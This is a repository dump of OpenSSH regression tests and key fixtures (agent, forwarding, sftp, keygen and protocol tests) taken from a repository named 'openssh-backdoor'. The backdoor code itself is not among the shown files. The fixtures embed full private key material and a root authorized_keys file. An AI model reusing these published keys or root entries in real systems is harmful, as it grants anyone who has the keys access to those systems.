${.CURDIR}/rsa_openssh.pub 51 | 52 | t4: 53 | ssh-keygen -lf ${.CURDIR}/rsa_openssh.pub |\ 54 | awk '{print $$2}' | diff - ${.CURDIR}/t4.ok 55 | 56 | t5: 57 | ssh-keygen -Bf ${.CURDIR}/rsa_openssh.pub |\ 58 | awk '{print $$2}' | diff - ${.CURDIR}/t5.ok 59 | 60 | t6: 61 | ssh-keygen -if ${.CURDIR}/dsa_ssh2.prv > t6.out1 62 | ssh-keygen -if ${.CURDIR}/dsa_ssh2.pub > t6.out2 63 | chmod 600 t6.out1 64 | ssh-keygen -yf t6.out1 | diff - t6.out2 65 | 66 | t7.out: 67 | ssh-keygen -q -t rsa -N '' -f $@ 68 | 69 | t7: t7.out 70 | ssh-keygen -lf t7.out > /dev/null 71 | ssh-keygen -Bf t7.out > /dev/null 72 | 73 | .for t in ${LTESTS} 74 | REGRESS_TARGETS+=t-${t} 75 | t-${t}: 76 | sh ${.CURDIR}/test-exec.sh ${.OBJDIR} ${.CURDIR}/${t}.sh 77 | .endfor 78 | 79 | .include "bsd.regress.mk" 80 | -------------------------------------------------------------------------------- /regress/agent-getpeereid.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: agent-getpeereid.sh,v 1.1 2002/12/09 16:05:02 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="disallow agent attach from other uid" 5 | 6 | UNPRIV=nobody 7 | ASOCK=${OBJ}/agent 8 | SSH_AUTH_SOCK=/nonexistant 9 | 10 | trace "start agent" 11 | eval `${SSHAGENT} -s -a ${ASOCK}` > /dev/null 12 | r=$? 13 | if [ $r -ne 0 ]; then 14 | fail "could not start ssh-agent: exit code $r" 15 | else 16 | chmod 644 ${SSH_AUTH_SOCK} 17 | 18 | ssh-add -l > /dev/null 2>&1 19 | r=$? 20 | if [ $r -ne 1 ]; then 21 | fail "ssh-add failed with $r != 1" 22 | fi 23 | 24 | < /dev/null sudo -S -u ${UNPRIV} ssh-add -l > /dev/null 2>&1 25 | r=$? 26 | if [ $r -lt 2 ]; then 27 | fail "ssh-add did not fail for ${UNPRIV}: $r < 2" 28 | fi 29 | 30 | trace "kill agent" 31 | ${SSHAGENT} -k > /dev/null 32 | fi 33 | 34 | rm -f ${OBJ}/agent 35 | -------------------------------------------------------------------------------- /regress/agent-ptrace.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: agent-ptrace.sh,v 1.1 2002/12/09 15:38:30 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="disallow agent ptrace attach" 5 | 6 | trace "start agent" 7 | eval `${SSHAGENT} -s` > /dev/null 8 | r=$? 9 | if [ $r -ne 0 ]; then 10 | fail "could not start ssh-agent: exit code $r" 11 | else 12 | # ls -l ${SSH_AUTH_SOCK} 13 | gdb ${SSHAGENT} ${SSH_AGENT_PID} > ${OBJ}/gdb.out 2>&1 << EOF 14 | quit 15 | EOF 16 | if [ $? -ne 0 ]; then 17 | fail "gdb failed: exit code $?" 18 | fi 19 | grep -q 'ptrace: Operation not permitted.' ${OBJ}/gdb.out 20 | r=$? 21 | rm -f ${OBJ}/gdb.out 22 | if [ $r -ne 0 ]; then 23 | fail "ptrace succeeded?: exit code $r" 24 | fi 25 | 26 | trace "kill agent" 27 | ${SSHAGENT} -k > /dev/null 28 | fi 29 | -------------------------------------------------------------------------------- /regress/agent-timeout.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: agent-timeout.sh,v 1.1 2002/06/06 00:38:40 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="agent timeout test" 5 | 6 | TIMEOUT=5 7 | 8 | trace "start agent" 9 | eval `${SSHAGENT} -s` > /dev/null 10 | r=$? 11 | if [ $r -ne 0 ]; then 12 | fail "could not start ssh-agent: exit code $r" 13 | else 14 | trace "add keys with timeout" 15 | for t in rsa rsa1; do 16 | ${SSHADD} -t ${TIMEOUT} $OBJ/$t > /dev/null 2>&1 17 | if [ $? -ne 0 ]; then 18 | fail "ssh-add did succeed exit code 0" 19 | fi 20 | done 21 | n=`${SSHADD} -l 2> /dev/null | wc -l` 22 | trace "agent has $n keys" 23 | if [ $n -ne 2 ]; then 24 | fail "ssh-add -l did not return 2 keys: $n" 25 | fi 26 | trace "sleeping 2*${TIMEOUT} seconds" 27 | sleep ${TIMEOUT} 28 | sleep ${TIMEOUT} 29 | ${SSHADD} -l 2> /dev/null | grep -q 'The agent has no identities.' 30 | if [ $? -ne 0 ]; then 31 | fail "ssh-add -l still returns keys after timeout" 32 | fi 33 | 34 | trace "kill agent" 35 | ${SSHAGENT} -k > /dev/null 36 | fi 37 | -------------------------------------------------------------------------------- /regress/authorized_keys_root: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt6ttBacbgvLPsF1VWWfT51t55/5Mj62Xp8EaoH5SNSaLiGIgrrja077lKEept75U4uKFUYU5JJX9GPE9A7Y43LXv+/A6Jm4rEj/U0s4H8tf0UmzVC3t6xh0sRK0hYVNILyoHnIAgdY8CmOiybw7p6DxJY8MRAehD3n9+kFcachU= root@xenon 2 | 1024 35 132789427207755621599908461558918671787816692978751485815532032934821830960131244604702969298486352138126114080367609979552547448841583955126231410604842765726397407176910594168641969541792069550006878863592030567875913190224374005367884774859544943329148178663694126456638431428703289837638970464685771819219 root@xenon 3 | -------------------------------------------------------------------------------- /regress/broken-pipe.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: broken-pipe.sh,v 1.4 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="broken pipe test" 5 | 6 | for p in 1 2; do 7 | trace "protocol $p" 8 | for i in 1 2 3 4; do 9 | ${SSH} -$p -F $OBJ/ssh_config_config nexthost echo $i 2> /dev/null | true 10 | r=$? 11 | if [ $r -ne 0 ]; then 12 | fail "broken pipe returns $r for protocol $p" 13 | fi 14 | done 15 | done 16 | -------------------------------------------------------------------------------- /regress/bsd.regress.mk: -------------------------------------------------------------------------------- 1 | # $OpenBSD: bsd.regress.mk,v 1.9 2002/02/17 01:10:15 marc Exp $ 2 | # No man pages for regression tests. 3 | NOMAN= 4 | 5 | # No installation. 6 | install: 7 | 8 | # If REGRESSTARGETS is defined and PROG is not defined, set NOPROG 9 | .if defined(REGRESSTARGETS) && !defined(PROG) 10 | NOPROG= 11 | .endif 12 | 13 | .include 14 | 15 | .MAIN: all 16 | all: regress 17 | 18 | # XXX - Need full path to REGRESSLOG, otherwise there will be much pain. 19 | 20 | REGRESSLOG?=/dev/null 21 | REGRESSNAME=${.CURDIR:S/${BSDSRCDIR}\/regress\///} 22 | 23 | .if defined(PROG) && !empty(PROG) 24 | run-regress-${PROG}: ${PROG} 25 | ./${PROG} 26 | .endif 27 | 28 | .if !defined(REGRESSTARGETS) 29 | REGRESSTARGETS=run-regress-${PROG} 30 | . if defined(REGRESSSKIP) 31 | REGRESSSKIPTARGETS=run-regress-${PROG} 32 | . endif 33 | .endif 34 | 35 | REGRESSSKIPSLOW?=no 36 | 37 | #.if (${REGRESSSKIPSLOW:L} == "yes") && defined(REGRESSSLOWTARGETS) 38 | 39 | .if (${REGRESSSKIPSLOW} == "yes") && defined(REGRESSSLOWTARGETS) 40 | REGRESSSKIPTARGETS+=${REGRESSSLOWTARGETS} 41 | .endif 42 | 43 | .if defined(REGRESSROOTTARGETS) 44 | ROOTUSER!=id -g 45 | SUDO?= 46 | . if (${ROOTUSER} != 0) && empty(SUDO) 47 | REGRESSSKIPTARGETS+=${REGRESSROOTTARGETS} 48 | . endif 49 | .endif 50 | 51 | REGRESSSKIPTARGETS?= 52 | 53 | regress: 54 | .for RT in ${REGRESSTARGETS} 55 | . if ${REGRESSSKIPTARGETS:M${RT}} 56 | @echo -n "SKIP " >> ${REGRESSLOG} 57 | . else 58 | # XXX - we need a better method to see if a test fails due to timeout or just 59 | # normal failure. 60 | . if !defined(REGRESSMAXTIME) 61 | @if cd ${.CURDIR} && ${MAKE} ${RT}; then \ 62 | echo -n "SUCCESS " >> ${REGRESSLOG} ; \ 63 | else \ 64 | echo -n "FAIL " >> ${REGRESSLOG} ; \ 65 | echo FAILED ; \ 66 | fi 67 | . else 68 | @if cd ${.CURDIR} && (ulimit -t ${REGRESSMAXTIME} ; ${MAKE} ${RT}); then \ 69 | echo -n "SUCCESS " >> ${REGRESSLOG} ; \ 70 | else \ 71 | echo -n "FAIL (possible timeout) " >> ${REGRESSLOG} ; \ 72 | echo FAILED ; \ 73 | fi 74 | . endif 75 | . endif 76 | @echo ${REGRESSNAME}/${RT:S/^run-regress-//} >> ${REGRESSLOG} 77 | .endfor 78 | 79 | .PHONY: regress 80 | -------------------------------------------------------------------------------- /regress/connect-privsep.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: connect-privsep.sh,v 1.1 2002/03/21 21:45:07 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="proxy connect with privsep" 5 | 6 | echo 'UsePrivilegeSeparation yes' >> $OBJ/sshd_proxy 7 | 8 | for p in 1 2; do 9 | ${SSH} -$p -F $OBJ/ssh_proxy 999.999.999.999 true 10 | if [ $? -ne 0 ]; then 11 | fail "ssh privsep+proxyconnect protocol $p failed" 12 | fi 13 | done 14 | -------------------------------------------------------------------------------- /regress/connect.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: connect.sh,v 1.4 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="simple connect" 5 | 6 | start_sshd 7 | 8 | for p in 1 2; do 9 | ${SSH} -o "Protocol=$p" -F $OBJ/ssh_config somehost true 10 | if [ $? -ne 0 ]; then 11 | fail "ssh connect with protocol $p failed" 12 | fi 13 | done 14 | -------------------------------------------------------------------------------- /regress/copy.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/regress/copy.1 -------------------------------------------------------------------------------- /regress/copy.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/regress/copy.2 -------------------------------------------------------------------------------- /regress/dsa_ssh2.prv: -------------------------------------------------------------------------------- 1 | ---- BEGIN SSH2 ENCRYPTED PRIVATE KEY ---- 2 | Subject: ssh-keygen test 3 | Comment: "1024-bit dsa, Tue Jan 08 2002 22:00:23 +0100" 4 | P2/56wAAAgIAAAAmZGwtbW9kcHtzaWdue2RzYS1uaXN0LXNoYTF9LGRoe3BsYWlufX0AAA 5 | AEbm9uZQAAAcQAAAHAAAAAAAAABACwUfm3AxZTut3icBmwCcD48nY64HzuELlQ+vEqjIcR 6 | Lo49es/DQTeLNQ+kdKRCfouosGNv0WqxRtF0tUsWdXxS37oHGa4QPugBdHRd7YlZGZv8kg 7 | x7FsoepY7v7E683/97dv2zxL3AGagTEzWr7fl0yPexAaZoDvtQrrjX44BLmwAABACWQkvv 8 | MxnD8eFkS1konFfMJ1CkuRfTN34CBZ6dY7VTSGemy4QwtFdMKmoufD0eKgy3p5WOeWCYKt 9 | F4FhjHKZk/aaxFjjIbtkrnlvXg64QI11dSZyBN6/ViQkHPSkUDF+A6AAEhrNbQbAFSvao1 10 | kTvNtPCtL0AkUIduEMzGQfLCTAAAAKDeC043YVo9Zo0zAEeIA4uZh4LBCQAAA/9aj7Y5ik 11 | ehygJ4qTDSlVypsPuV+n59tMS0e2pfrSG87yf5r94AKBmJeho5OO6wYaXCxsVB7AFbSUD6 12 | 75AK8mHF4v1/+7SWKk5f8xlMCMSPZ9K0+j/W1d/q2qkhnnDZolOHDomLA+U00i5ya/jnTV 13 | zyDPWLFpWK8u3xGBPAYX324gAAAKDHFvooRnaXdZbeWGTTqmgHB1GU9A== 14 | ---- END SSH2 ENCRYPTED PRIVATE KEY ---- 15 | -------------------------------------------------------------------------------- /regress/dsa_ssh2.pub: -------------------------------------------------------------------------------- 1 | ---- BEGIN SSH2 PUBLIC KEY ---- 2 | Subject: ssh-keygen test 3 | Comment: "1024-bit dsa, Tue Jan 08 2002 22:00:23 +0100" 4 | AAAAB3NzaC1kc3MAAACBALBR+bcDFlO63eJwGbAJwPjydjrgfO4QuVD68SqMhxEujj16z8 5 | NBN4s1D6R0pEJ+i6iwY2/RarFG0XS1SxZ1fFLfugcZrhA+6AF0dF3tiVkZm/ySDHsWyh6l 6 | ju/sTrzf/3t2/bPEvcAZqBMTNavt+XTI97EBpmgO+1CuuNfjgEubAAAAFQDeC043YVo9Zo 7 | 0zAEeIA4uZh4LBCQAAAIEAlkJL7zMZw/HhZEtZKJxXzCdQpLkX0zd+AgWenWO1U0hnpsuE 8 | MLRXTCpqLnw9HioMt6eVjnlgmCrReBYYxymZP2msRY4yG7ZK55b14OuECNdXUmcgTev1Yk 9 | JBz0pFAxfgOgABIazW0GwBUr2qNZE7zbTwrS9AJFCHbhDMxkHywkwAAACAWo+2OYpHocoC 10 | eKkw0pVcqbD7lfp+fbTEtHtqX60hvO8n+a/eACgZiXoaOTjusGGlwsbFQewBW0lA+u+QCv 11 | JhxeL9f/u0lipOX/MZTAjEj2fStPo/1tXf6tqpIZ5w2aJThw6JiwPlNNIucmv4501c8gz1 12 | ixaVivLt8RgTwGF99uI= 13 | ---- END SSH2 PUBLIC KEY ---- 14 | -------------------------------------------------------------------------------- /regress/exit-status.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: exit-status.sh,v 1.6 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="remote exit status" 5 | 6 | for p in 1 2; do 7 | for s in 0 1 4 5 44; do 8 | trace "proto $p status $s" 9 | verbose "test $tid: proto $p status $s" 10 | ${SSH} -$p -F $OBJ/ssh_proxy otherhost exit $s 11 | r=$? 12 | if [ $r -ne $s ]; then 13 | fail "exit code mismatch for protocol $p: $r != $s" 14 | fi 15 | 16 | # same with early close of stdout/err 17 | ${SSH} -$p -F $OBJ/ssh_proxy -n otherhost \ 18 | exec sh -c \'"sleep 2; exec > /dev/null 2>&1; sleep 3; exit $s"\' 19 | r=$? 20 | if [ $r -ne $s ]; then 21 | fail "exit code (with sleep) mismatch for protocol $p: $r != $s" 22 | fi 23 | done 24 | done 25 | -------------------------------------------------------------------------------- /regress/forwarding.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: forwarding.sh,v 1.4 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="local and remote forwarding" 5 | 6 | start_sshd 7 | 8 | base=33 9 | last=$PORT 10 | fwd="" 11 | for j in 0 1 2; do 12 | for i in 0 1 2; do 13 | a=$base$j$i 14 | b=`expr $a + 50` 15 | c=$last 16 | # fwd chain: $a -> $b -> $c 17 | fwd="$fwd -L$a:127.0.0.1:$b -R$b:127.0.0.1:$c" 18 | last=$a 19 | done 20 | done 21 | for p in 1 2; do 22 | q=`expr 3 - $p` 23 | trace "start forwarding, fork to background" 24 | ${SSH} -$p -F $OBJ/ssh_config -f $fwd somehost sleep 10 25 | 26 | trace "transfer over forwarded channels and check result" 27 | ${SSH} -$q -F $OBJ/ssh_config -p$last -o 'ConnectionAttempts=4' \ 28 | somehost cat /bin/ls > $OBJ/ls.copy 29 | test -f $OBJ/ls.copy || fail "failed copy /bin/ls" 30 | cmp /bin/ls $OBJ/ls.copy || fail "corrupted copy of /bin/ls" 31 | 32 | sleep 10 33 | done 34 | -------------------------------------------------------------------------------- /regress/keygen-change.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: keygen-change.sh,v 1.2 2002/07/16 09:15:55 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="change passphrase for key" 5 | 6 | S1="secret1" 7 | S2="2secret" 8 | 9 | for t in rsa dsa rsa1; do 10 | # generate user key for agent 11 | trace "generating $t key" 12 | rm -f $OBJ/$t-key 13 | ${SSHKEYGEN} -q -N ${S1} -t $t -f $OBJ/$t-key 14 | if [ $? -eq 0 ]; then 15 | ${SSHKEYGEN} -p -P ${S1} -N ${S2} -f $OBJ/$t-key > /dev/null 16 | if [ $? -ne 0 ]; then 17 | fail "ssh-keygen -p failed for $t-key" 18 | fi 19 | else 20 | fail "ssh-keygen for $t-key failed" 21 | fi 22 | rm -f $OBJ/$t-key $OBJ/$t-key.pub 23 | done 24 | -------------------------------------------------------------------------------- /regress/keyscan.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: keyscan.sh,v 1.3 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="keyscan" 5 | 6 | # remove DSA hostkey 7 | rm -f ${OBJ}/host.dsa 8 | 9 | start_sshd 10 | 11 | for t in rsa1 rsa dsa; do 12 | trace "keyscan type $t" 13 | ${SSHKEYSCAN} -t $t -p $PORT 127.0.0.1 127.0.0.1 127.0.0.1 \ 14 | > /dev/null 2>&1 15 | r=$? 16 | if [ $r -ne 0 ]; then 17 | fail "ssh-keyscan -t $t failed with: $r" 18 | fi 19 | done 20 | -------------------------------------------------------------------------------- /regress/proto-mismatch.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: proto-mismatch.sh,v 1.3 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="protocol version mismatch" 5 | 6 | mismatch () 7 | { 8 | server=$1 9 | client=$2 10 | banner=`echo ${client} | ${SSHD} -o "Protocol=${server}" -i -f ${OBJ}/sshd_proxy` 11 | r=$? 12 | trace "sshd prints ${banner}" 13 | if [ $r -ne 255 ]; then 14 | fail "sshd prints ${banner} and accepts connect with version ${client}" 15 | fi 16 | } 17 | 18 | mismatch 2 SSH-1.5-HALLO 19 | mismatch 1 SSH-2.0-HALLO 20 | -------------------------------------------------------------------------------- /regress/proto-version.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: proto-version.sh,v 1.3 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="sshd version with different protocol combinations" 5 | 6 | # we just start sshd in inetd mode and check the banner 7 | check_version () 8 | { 9 | version=$1 10 | expect=$2 11 | banner=`echo -n | ${SSHD} -o "Protocol=${version}" -i -f ${OBJ}/sshd_proxy` 12 | case ${banner} in 13 | SSH-1.99-*) 14 | proto=199 15 | ;; 16 | SSH-2.0-*) 17 | proto=20 18 | ;; 19 | SSH-1.5-*) 20 | proto=15 21 | ;; 22 | *) 23 | proto=0 24 | ;; 25 | esac 26 | if [ ${expect} -ne ${proto} ]; then 27 | fail "wrong protocol version ${banner} for ${version}" 28 | fi 29 | } 30 | 31 | check_version 2,1 199 32 | check_version 1,2 199 33 | check_version 2 20 34 | check_version 1 15 35 | -------------------------------------------------------------------------------- /regress/proxy-connect.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: proxy-connect.sh,v 1.5 2002/12/09 15:28:46 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="proxy connect" 5 | 6 | for p in 1 2; do 7 | ${SSH} -$p -F $OBJ/ssh_proxy 999.999.999.999 true 8 | if [ $? -ne 0 ]; then 9 | fail "ssh proxyconnect protocol $p failed" 10 | fi 11 | SSH_CONNECTION=`${SSH} -$p -F $OBJ/ssh_proxy 999.999.999.999 'echo $SSH_CONNECTION'` 12 | if [ $? -ne 0 ]; then 13 | fail "ssh proxyconnect protocol $p failed" 14 | fi 15 | if [ "$SSH_CONNECTION" != "UNKNOWN 65535 UNKNOWN 65535" ]; then 16 | fail "bad SSH_CONNECTION" 17 | fi 18 | done 19 | -------------------------------------------------------------------------------- /regress/rsa_openssh.prv: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICWgIBAAKBgQDsilwKcaKN6wSMNd1WgQ9+HRqQEkD0kCTVttrazGu0OhBU3Uko 3 | +dFD1Ip0CxdXmN25JQWxOYF7h/Ocu8P3jzv3RTX87xKR0YzlXTLX+SLtF/ySebS3 4 | xWPrlfRUDhh03hR5V+8xxvvy9widPYKw/oItwGSueOsEq1LTczCDv2dAjQIDAQAB 5 | An8nH5VzvHkMbSqJ6eOYDsVwomRvYbH5IEaYl1x6VATITNvAu9kUdQ4NsSpuMc+7 6 | Jj9gKZvmO1y2YCKc0P/iO+i/eV0L+yQh1Rw18jQZll+12T+LZrKRav03YNvMx0gN 7 | wqWY48Kt6hv2/N/ebQzKRe79+D0t2cTh92hT7xENFLIBAkEBGnoGKFjAUkJCwO1V 8 | mzpUqMHpRZVOrqP9hUmPjzNJ5oBPFGe4+h1hoSRFOAzaNuZt8ssbqaLCkzB8bfzj 9 | qhZqAQJBANZekuUpp8iBLeLSagw5FkcPwPzq6zfExbhvsZXb8Bo/4SflNs4JHXwI 10 | 7SD9Z8aJLvM4uQ/5M70lblDMQ40i3o0CQQDIJvBYBFL5tlOgakq/O7yi+wt0L5BZ 11 | 9H79w5rCSAA0IHRoK/qI1urHiHC3f3vbbLk5UStfrqEaND/mm0shyNIBAkBLsYdC 12 | /ctt5Bc0wUGK4Vl5bBmj9LtrrMJ4FpBpLwj/69BwCuKoK9XKZ0h73p6XHveCEGRg 13 | PIlFX4MtaoLrwgU9AkBV2k4dgIws+X8YX65EsyyFjnlDqX4x0nSOjQB1msIKfHBr 14 | dh5XLDBTTCxnKhMJ0Yx/opgOvf09XHBFwaQntR5i 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /regress/rsa_openssh.pub: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDsilwKcaKN6wSMNd1WgQ9+HRqQEkD0kCTVttrazGu0OhBU3Uko+dFD1Ip0CxdXmN25JQWxOYF7h/Ocu8P3jzv3RTX87xKR0YzlXTLX+SLtF/ySebS3xWPrlfRUDhh03hR5V+8xxvvy9widPYKw/oItwGSueOsEq1LTczCDv2dAjQ== 2 | -------------------------------------------------------------------------------- /regress/rsa_ssh2.prv: -------------------------------------------------------------------------------- 1 | ---- BEGIN SSH2 ENCRYPTED PRIVATE KEY ---- 2 | Subject: ssh-keygen test 3 | Comment: "1024-bit rsa, Sat Jun 23 2001 12:21:26 -0400" 4 | P2/56wAAAi4AAAA3aWYtbW9kbntzaWdue3JzYS1wa2NzMS1zaGExfSxlbmNyeXB0e3JzYS 5 | 1wa2NzMXYyLW9hZXB9fQAAAARub25lAAAB3wAAAdsAAAARAQABAAAD9icflXO8eQxtKonp 6 | 45gOxXCiZG9hsfkgRpiXXHpUBMhM28C72RR1Dg2xKm4xz7smP2Apm+Y7XLZgIpzQ/+I76L 7 | 95XQv7JCHVHDXyNBmWX7XZP4tmspFq/Tdg28zHSA3CpZjjwq3qG/b8395tDMpF7v34PS3Z 8 | xOH3aFPvEQ0UsgEAAAQA7IpcCnGijesEjDXdVoEPfh0akBJA9JAk1bba2sxrtDoQVN1JKP 9 | nRQ9SKdAsXV5jduSUFsTmBe4fznLvD948790U1/O8SkdGM5V0y1/ki7Rf8knm0t8Vj65X0 10 | VA4YdN4UeVfvMcb78vcInT2CsP6CLcBkrnjrBKtS03Mwg79nQI0AAAH/VdpOHYCMLPl/GF 11 | +uRLMshY55Q6l+MdJ0jo0AdZrCCnxwa3YeVywwU0wsZyoTCdGMf6KYDr39PVxwRcGkJ7Ue 12 | YgAAAgDWXpLlKafIgS3i0moMORZHD8D86us3xMW4b7GV2/AaP+En5TbOCR18CO0g/WfGiS 13 | 7zOLkP+TO9JW5QzEONIt6NAAACAQEaegYoWMBSQkLA7VWbOlSowelFlU6uo/2FSY+PM0nm 14 | gE8UZ7j6HWGhJEU4DNo25m3yyxuposKTMHxt/OOqFmoB 15 | ---- END SSH2 ENCRYPTED PRIVATE KEY ---- 16 | --- 17 | -------------------------------------------------------------------------------- /regress/runtests.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | TEST_SSH_SSH=../ssh 4 | TEST_SSH_SSHD=../sshd 5 | TEST_SSH_SSHAGENT=../ssh-agent 6 | TEST_SSH_SSHADD=../ssh-add 7 | TEST_SSH_SSHKEYGEN=../ssh-keygen 8 | TEST_SSH_SSHKEYSCAN=../ssh-keyscan 9 | TEST_SSH_SFTP=../sftp 10 | TEST_SSH_SFTPSERVER=../sftp-server 11 | 12 | pmake 13 | 14 | -------------------------------------------------------------------------------- /regress/sftp-batch.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: sftp-batch.sh,v 1.2 2003/01/10 07:52:41 djm Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="sftp batchfile" 5 | 6 | DATA=/bin/ls 7 | COPY=${OBJ}/copy 8 | BATCH=${OBJ}/sftp-batch 9 | 10 | rm -rf ${COPY} ${COPY}.1 ${COPY}.2 ${COPY}.dd ${BATCH}.* 11 | 12 | cat << EOF > ${BATCH}.pass.1 13 | get $DATA $COPY 14 | put ${COPY} ${COPY}.1 15 | rm ${COPY} 16 | -put ${COPY} ${COPY}.2 17 | EOF 18 | 19 | cat << EOF > ${BATCH}.pass.2 20 | # This is a comment 21 | 22 | # That was a blank line 23 | ls 24 | EOF 25 | 26 | cat << EOF > ${BATCH}.fail.1 27 | get $DATA $COPY 28 | put ${COPY} ${COPY}.3 29 | rm ${COPY}.* 30 | # The next command should fail 31 | put ${COPY}.3 ${COPY}.4 32 | EOF 33 | 34 | cat << EOF > ${BATCH}.fail.2 35 | # The next command should fail 36 | jajajajaja 37 | EOF 38 | 39 | verbose "$tid: good commands" 40 | ${SFTP} -b ${BATCH}.pass.1 -P ${SFTPSERVER} >/dev/null 2>&1 \ 41 | || fail "good commands failed" 42 | 43 | verbose "$tid: bad commands" 44 | ${SFTP} -b ${BATCH}.fail.1 -P ${SFTPSERVER} >/dev/null 2>&1 \ 45 | && fail "bad commands succeeded" 46 | 47 | verbose "$tid: comments and blanks" 48 | ${SFTP} -b ${BATCH}.pass.2 -P ${SFTPSERVER} >/dev/null 2>&1 \ 49 | || fail "comments & blanks failed" 50 | 51 | verbose "$tid: junk command" 52 | ${SFTP} -b ${BATCH}.fail.2 -P ${SFTPSERVER} >/dev/null 2>&1 \ 53 | && fail "junk command succeeded" 54 | 55 | rm -rf ${COPY} ${COPY}.1 ${COPY}.2 ${COPY}.dd ${BATCH}.* 56 | 57 | 58 | -------------------------------------------------------------------------------- /regress/sftp.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: sftp.sh,v 1.2 2002/03/27 22:39:52 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="basic sftp put/get" 5 | 6 | DATA=/bin/ls 7 | COPY=${OBJ}/copy 8 | 9 | BUFFERSIZE="5 1000 32000 64000" 10 | REQUESTS="1 2 10" 11 | 12 | for B in ${BUFFERSIZE}; do 13 | for R in ${REQUESTS}; do 14 | verbose "test $tid: buffer_size $B num_requests $R" 15 | rm -f ${COPY}.1 ${COPY}.2 16 | ${SFTP} -P ${SFTPSERVER} -B $B -R $R -b /dev/stdin \ 17 | > /dev/null 2>&1 << EOF 18 | version 19 | get $DATA ${COPY}.1 20 | put $DATA ${COPY}.2 21 | EOF 22 | r=$? 23 | if [ $r -ne 0 ]; then 24 | fail "sftp failed with $r" 25 | fi 26 | cmp $DATA ${COPY}.1 || fail "corrupted copy after get" 27 | cmp $DATA ${COPY}.2 || fail "corrupted copy after put" 28 | done 29 | done 30 | -------------------------------------------------------------------------------- /regress/ssh-com-keygen.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: ssh-com-keygen.sh,v 1.2 2002/07/16 08:58:16 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="ssh.com key import" 5 | 6 | #TEST_COMBASE=/path/to/ssh/com/binaries 7 | if [ "X${TEST_COMBASE}" = "X" ]; then 8 | fatal '$TEST_COMBASE is not set' 9 | fi 10 | 11 | VERSIONS=" 12 | 2.0.10 13 | 2.0.12 14 | 2.0.13 15 | 2.1.0 16 | 2.2.0 17 | 2.3.0 18 | 2.3.1 19 | 2.4.0 20 | 3.0.0 21 | 3.1.0 22 | 3.2.0 23 | 3.3.0" 24 | 25 | COMPRV=${OBJ}/comkey 26 | COMPUB=${COMPRV}.pub 27 | OPENSSHPRV=${OBJ}/opensshkey 28 | OPENSSHPUB=${OPENSSHPRV}.pub 29 | 30 | # go for it 31 | for v in ${VERSIONS}; do 32 | keygen=${TEST_COMBASE}/${v}/ssh-keygen2 33 | if [ ! -x ${keygen} ]; then 34 | continue 35 | fi 36 | types="dss" 37 | case $v in 38 | 2.3.1|3.*) 39 | types="$types rsa" 40 | ;; 41 | esac 42 | for t in $types; do 43 | verbose "ssh-keygen $v/$t" 44 | rm -f $COMPRV $COMPUB $OPENSSHPRV $OPENSSHPUB 45 | ${keygen} -q -P -t $t ${COMPRV} > /dev/null 2>&1 46 | if [ $? -ne 0 ]; then 47 | fail "${keygen} -t $t failed" 48 | continue 49 | fi 50 | ${SSHKEYGEN} -if ${COMPUB} > ${OPENSSHPUB} 51 | if [ $? -ne 0 ]; then 52 | fail "import public key ($v/$t) failed" 53 | continue 54 | fi 55 | ${SSHKEYGEN} -if ${COMPRV} > ${OPENSSHPRV} 56 | if [ $? -ne 0 ]; then 57 | fail "import private key ($v/$t) failed" 58 | continue 59 | fi 60 | chmod 600 ${OPENSSHPRV} 61 | ${SSHKEYGEN} -yf ${OPENSSHPRV} |\ 62 | diff - ${OPENSSHPUB} 63 | if [ $? -ne 0 ]; then 64 | fail "public keys ($v/$t) differ" 65 | fi 66 | done 67 | done 68 | 69 | rm -f $COMPRV $COMPUB $OPENSSHPRV $OPENSSHPUB 70 | -------------------------------------------------------------------------------- /regress/ssh-com-sftp.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: ssh-com-sftp.sh,v 1.3 2002/07/16 08:58:16 markus 